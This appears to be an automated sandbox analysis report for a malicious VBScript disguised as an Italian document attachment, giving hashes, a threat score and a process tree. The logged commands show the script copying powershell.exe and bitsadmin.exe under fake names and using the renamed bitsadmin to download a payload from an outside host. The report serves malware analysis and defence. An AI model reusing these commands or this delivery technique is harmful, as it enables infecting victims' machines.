a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056

Analysis

Target

Allegato_doc_BRNLSN65H44H501N.vbs
Size

3KB
MD5

399426adfd02de2e27ebca41608be96e
SHA1

7b7629618e0cf7d4826b6c8c6dceea344233df3b
SHA256

a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056
SHA512

68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd

Score

8^/10

Executes dropped EXE 1 IoCs

Processes:

nUpPg.exe

pid process

800 nUpPg.exe

pid	process
800	nUpPg.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 2896 wrote to memory of 2684	2896	WScript.exe	cmd.exe
PID 2896 wrote to memory of 2684	2896	WScript.exe	cmd.exe
PID 2896 wrote to memory of 560	2896	WScript.exe	cmd.exe
PID 2896 wrote to memory of 560	2896	WScript.exe	cmd.exe
PID 2896 wrote to memory of 800	2896	WScript.exe	nUpPg.exe
PID 2896 wrote to memory of 800	2896	WScript.exe	nUpPg.exe
PID 2896 wrote to memory of 800	2896	WScript.exe	nUpPg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe
  2⤵
  PID:2684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe
  2⤵
  PID:560
- C:\Users\Admin\AppData\Roaming\nUpPg.exe
  "C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif
  2⤵
  - Executes dropped EXE
  PID:800